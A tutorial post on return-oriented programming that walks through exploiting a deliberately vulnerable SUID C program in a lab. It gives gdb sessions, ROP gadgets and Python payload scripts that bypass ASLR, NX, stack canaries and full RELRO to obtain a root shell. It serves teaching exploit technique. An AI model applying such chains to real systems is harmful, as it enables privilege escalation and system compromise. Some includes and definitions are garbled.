An Introduction to Returned-Oriented Programming (Linux)
INTRODUCTION:
In 1988, the first buffer overflow was exploited to compromise many systems. After 20 years, applications are still vulnerable, despite the efforts made in hope to reduce their vulnerability.
In the past, the most complex priority was discovering bugs, and nobody cared about writing exploits because it was so easy. Nowadays, exploiting buffer overflows is also difficult because of advanced defensive technologies.
Some strategies are adopted in combination to make exploit development more difficult than ever like ASLR, Non-executable memory sections, etc.
In this tutorial, we will describe how to defeat or bypass ASLR, NX, ASCII ARMOR, SSP and RELRO protection in the same time and in a single attempt using a technique called Returned Oriented Programming.
Let's begin with some basic/old definitions:
→ NX: non-executable memory section (stack, heap), which prevent the execution of an arbitrary code. This protection was easy to defeat it if we make a correct ret2libc and also borrowed chunk techniques.
→ ASLR: Address Space Layout Randomization that randomizes a section of memory (stack, heap and shared objects). This technique is bypassed by brute forcing the return address.
→ ASCII ARMOR: maps libc addresses starting with a NULL byte. This technique is used to prevent ret2lib attacks, hardening the binary.
→ RELRO: another exploit mitigation technique to harden ELF binaries. It has two modes:
Non-PLT GOT is read-only.
Compile command: gcc -Wl,-z,relro -o bin file.c
Compiler command: gcc -Wl,-z,relro,-z,now -o bin file.c
→ SSP: Stack Smashing Protection:
Our Exploit will bypass all those mitigations, and make a reliable exploit.
So let's go
OVERVIEW OF THE CODE:
Here is the vulnerable code. The binary and code are included in the last of tutorial.
[c language="sharp"]
#include
#include
#include
#include <sys/types.h>
#include <sys/stat.h>
#include
#include
void fill(int,int,int*);
int main(int argc,char** argv)
{
FILE* fd;
int in1,in2;
int arr[2048];
char var[20];
if (argc !=2){
printf("usage : %s n",*argv);
exit(-1);
}
fd = fopen(argv[1],"r");
if(fd == NULL)
{
fprintf(stderr,"%sn",strerror(errno));
exit(-2);
}
memset(var,0,sizeof(var));
memset(arr,0,2048*sizeof(int));
while(fgets(var,20,fd))
{
in1 = atoll(var);
fgets(var,20,fd);
in2 = atoll(var);
/* fill array */
fill(in1,in2,arr);
}
}
void fill(int of,int val,int *tab)
{
tab[of]=val;
}
First thing let's explain what the code does.
It opens a filename, reads from it line by line and holds in1 as an offset of table and in2 as a value of this offset then it calls fill function to fill the array.
tab[in1]=in2 ;
So a buffer overflow occurred when in1 is the offset of return address, this we can write whatever there.
Let's compile the vulnerable code:
[cpp]
gcc -o vuln2 vuln2.c -fstack-protector -Wl,-z,relro,-z,now
chown root:root vuln2
chmod +s vuln2
And we check the resulting binary using checksec.sh
[cpp]user@protostar:~/course$ checksec.sh --file vuln2
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE
Full RELRO Canary found NX enabled No PIE No RPATH No RUNPATH vuln2
user@protostar:~/course$
So the binary is hardened, but motivated attackers still succeed in their intent.
As we can see we can overwrite EIP directly, and if we assume that we can do that, the SSP does some checks to see if the return address has changed, if yes then our exploit will fail.
OWNING EIP:
Let's open the binary with gdb and disassemble the main function:
gdb$ disas main
Dump of assembler code for function main:
0x08048624 <main+0>: push ebp
...
0x08048754 <main+304>: mov DWORD PTR [esp+0x202c],eax
0x0804875b <main+311>: lea eax,[esp+0x2c]
0x0804875f <main+315>: mov DWORD PTR [esp+0x8],eax
0x08048763 <main+319>: mov eax,DWORD PTR [esp+0x202c]
0x0804876a <main+326>: mov DWORD PTR [esp+0x4],eax
0x0804876e <main+330>: mov eax,DWORD PTR [esp+0x2030]
0x08048775 <main+337>: mov DWORD PTR [esp],eax
0x08048778 <main+340>: call 0x80487be
0x0804877d <main+345>: mov eax,DWORD PTR [esp+0x2034]
0x08048784 <main+352>: mov DWORD PTR [esp+0x8],eax
...
Let's create a simple file named 'simo.txt' and put the following:
[plain]
1
10
We make some breakpoints:
[cpp]
gdb$ b *main
Breakpoint 1 at 0x8048624
gdb$ b *0x08048778
Breakpoint 2 at 0x8048778
gdb$ run file
Breakpoint 1, 0x08048624 in main ()
gdb$ x/x $esp
0xbffff7cc: 0xb7eabc76
gdb$ continue
Breakpoint 2, 0x08048778 in main ()
gdb$ x/4x $esp
0xbfffd770: 0x00000001 0x0000000a 0xbfffd79c 0x00000000
gdb$ x/i 0x08048778
0x8048778 &lt;main+340&gt;: call 0x80487be
gdb$
In the first bpoints we see the return address
0xbffff7dc: is main return address
0xbfffd79c : the address of arr
If you're familiar with stack frame, you'll notice that we made a call: fill(1,10,arr)
then it does the following : arr[1]=10 ;
A clever hacker will notice that the offset between the address of arr and return address is 8240
(0xbffff7cc-0xbfffd79c = 8240) and because we are playing with integer values, then we must divide the result by 4 ( sizeof(int)) .so, 8240/4=2060.
So if we put an offset equal to 2060 we can write to EIP, let's check:
Put the following in simo.txt:
[cpp]
2060
1094861636
The result is:
[cpp]
Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
EAX: 00000000 EBX: B7FD5FF4 ECX: B7FDF000 EDX: 00000000 o d I t s Z a P c
ESI: 00000000 EDI: 00000000 EBP: BFFFF848 ESP: BFFFF7D0 EIP: 41424344
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop:
Cannot access memory at address 0x41424344
0x41424344 in ?? ()
gdb$
So we are successfully own EIP and bypassed Stack Smashing Protection.
Let's build our exploit now.
BUILDING THE EXPLOIT:
Our aim now is to build a chained ROP to execute execve(). As we can see, we don't have a GOT entry for this function and libc is randomized.
So what we will do first is to leak a libc function address for GOT then we will do some trivial calculation to get the exact execve libc address.
And remember that we cannot overwrite GOT because of « Full Relro » .
[cpp]
readelf -r vuln2
08049fcc 00000107 R_386_JUMP_SLOT 00000000 __errno_location
08049fd0 00000207 R_386_JUMP_SLOT 00000000 strerror
08049fd4 00000307 R_386_JUMP_SLOT 00000000 __gmon_start__
08049fd8 00000407 R_386_JUMP_SLOT 00000000 fgets
08049fdc 00000507 R_386_JUMP_SLOT 00000000 memset
08049fe0 00000607 R_386_JUMP_SLOT 00000000 __libc_start_main
08049fe4 00000707 R_386_JUMP_SLOT 00000000 atoll
08049fe8 00000807 R_386_JUMP_SLOT 00000000 fopen
08049fec 00000907 R_386_JUMP_SLOT 00000000 printf
08049ff0 00000a07 R_386_JUMP_SLOT 00000000 fprintf
08049ff4 00000b07 R_386_JUMP_SLOT 00000000 __stack_chk_fail
08049ff8 00000c07 R_386_JUMP_SLOT 00000000 exit
Let's leak the address of printf (you can choose any GOT entry)
[cpp]
gdb$ x/x 0x08049fec
0x8049fec &lt;_GLOBAL_OFFSET_TABLE_+44&gt;: 0xb7edbf90
gdb$ p execve
$9 = {} 0xb7f2c170
gdb$ p 0xb7f2c170-0xb7edbf90
$10 = 328160
gdb$
The offset between printf and execve is 328160.
So if we add the address of printf libc to 328160 we get the execve libc address dynamically by leaking the printf address that is loaded in GOT.
[cpp]
execve = printf@libc+ 328160
So we must find some ROPs
The next step is finding some useful gadgets to build a chain of instructions. We'll use ROPEME to do that.
We generate a .ggt file which contains some instructions finished by a ret.
Our purpose is to do some instruction, then return into our controlled code.
[cpp]
ROPeMe&gt; generate vuln 6
We need those useful gadgets to build our exploit.
[cpp]
0x804886eL: add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx
0x804861fL: call eax ; leave ;;
0x804849cL: pop eax ; pop ebx ; leave ;;
So let's build our ROP using those gadgets.
Our attack then: load 328160 into EAX, 0x138e9ff4 into EBX. You'll ask me what is 0x138e9ff4?
Well we have a gadget like this:
[cpp]
0x804886eL: add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx
ebx-0xb8a0008= printf@got then , ebx = printf@got+ 0xb8a0008 = 0x138e9ff4
So EAX = 328160 and EBX = 0x138e9ff4.
When «add eax [ebx-0xb8a0008]» executed EAX will contain the address of execve dynamically
After that, we make call%eax to execute our command and don't forget to put the correct parameters on the stack.
There is a small problem which must be resolved. When the leave instruction is executed, it loads the saved return address of the main lead losing our controlled data. The solution is easy; like what we did earlier. Some trivial calculations, and we get the correct saved return address.
[cpp]
0x8048778 &lt;main+340&gt;: call 0x80487be
Breakpoint 1, 0x08048778 in main ()
gdb$ x/4x $esp
0xbfffd770: 0x0000080c 0x0804849c 0xbfffd79c 0x00000000
We continue.
[cpp]
0x804849f &lt;_init+47&gt;: ret
0x0804849f in _init ()
gdb$ x/x $esp
0xbffff84c: 0x0804886e
When «leave » is executed, ESP points to another area that we are not able to control.
Let's predict where ESP points exactly: as we did earlier, we subtract arr address from ESP and dividing by 4: (0xbffff84c-0xbfffd79c)/4 = 2092
So our payload will look like this:
[python]
#!/usr/bin/python
r = &quot;n&quot;
p = str(2060) +r # offset of return address
p += str(0x804849c) +r # pop eax ; pop ebx ; leave ;;
p += str(2061) +r
p += str(328160)+r # EAX
p += str(2062)+r
p += str(0x138e9ff4)+r # EBX
p += str(2092) +r
p += str(0x804886e)+r # add eax [ebx-0xb8a0008] ; add esp 0x4
#; pop ebx
p += str(2096) +r
p += str(0x41414141) +r
o = open(&quot;simo.txt&quot;,&quot;wb&quot;)
o.write(p)
o.close()
Let's see what happens:
[cpp]
Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
EAX: B7F2C170 EBX: 00000002 ECX: B7FDF000 EDX: 00000000 o d I t S z a p c
ESI: 00000000 EDI: 00000000 EBP: BFFFF874 ESP: BFFFF860 EIP: 41414141
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop:
Cannot access memory at address 0x41414141
0x41414141 in ?? ()
gdb$ x/x $eax
0xb7f2c170 : 0x8908ec83
gdb$
It works!
So EAX contains the address of execve and we still control EIP. The next step is to find some a printable string and two null values to make parameters for execve.
We search inside the binary using objdump:
[cpp]
user@protostar:~/course$ objdump -s vuln2 |more
vuln2: file format elf32-i386
Contents of section .interp:
8048134 2f6c6962 2f6c642d 6c696e75 782e736f /lib/ld-linux.so
8048144 2e3200 .2.
Contents of section .note.ABI-tag:
8048148 04000000 10000000 01000000 474e5500 ............GNU.
8048158 00000000 02000000 06000000 12000000 ................
0x0x8048154 points to a printable ASCII: « GNU » and 8048158 points to NULL bytes.
Our exploit is then: execve(0x 8048158, 0x8048154, 0x8048154). But we don't have GNU as a command, well we will create a wrapper named GNU.c :
[c language="language="]
#include
/* compile : gcc -o GNU GNU.c
int main()
{
char *args[]={&quot;/bin/sh&quot;,NULL};
execve(args[0],args,NULL);
}
Then add path where GNU is located to $PATH variable environment :
export PATH=/yourpath/:$PATH
Our final exploit :
[python]
#!/usr/bin/python
r = &quot;n&quot;
p = str(2060) +r # offset of return address
p += str(0x804849c) +r # pop eax ; pop ebx ; leave ;;
p += str(2061) +r
p += str(328160)+r # offset between printf and execve
p += str(2062)+r
p += str(0x138e9ff4)+r # printf@got + 0xb8a0008
p += str(2092) +r
p += str(0x804886e)+r # add eax [ebx-0xb8a0008] ; add esp 0x4
#; pop ebx
p += str(2096) +r
p += str(0x804861f) +r #: call eax ; leave ;;
p += str(2097) +r
p += str(0x8048154) +r # &quot;GNU&quot;
p += str(2098)+r
p += str(0x8048158) +r # pointer to NULL
p += str(2099)+r
p += str(0x8049fb0) +r # pointer to NULL
o = open(&quot;simo.txt&quot;,&quot;wb&quot;)
o.write(p)
o.close()
let's run our attack :
[cpp]
user@protostar:~/course$ python exploit.py
user@protostar:~/course$ ./vuln2 simo.txt
# whoami
root
#
It works, so we successfully got the shell with SUID privileges, and we bypassed all exploit mitigations in one attempt .
If you opened the binary with gdb you'll notice that the addresses changed during the execution of process, and our exploit is still reliable and resolves execve reliably.
Conclusion:
We presented a new attack against programs vulnerable to stack overflows to bypass two of the most widely used protections (NX & ASLR) including some others (Full RELRO,ASCII ARMOR, SSP) .
With our exploit, we extracted the address space from vulnerable process information about random addresses of some libc functions to mount a classical ret2libc attack.
References :
PAYLOAD ALREADY INSIDE: DATA REUSE FOR ROP
EXPLOITS
Surgically returning to randomized lib(c)
Become a certified reverse engineer!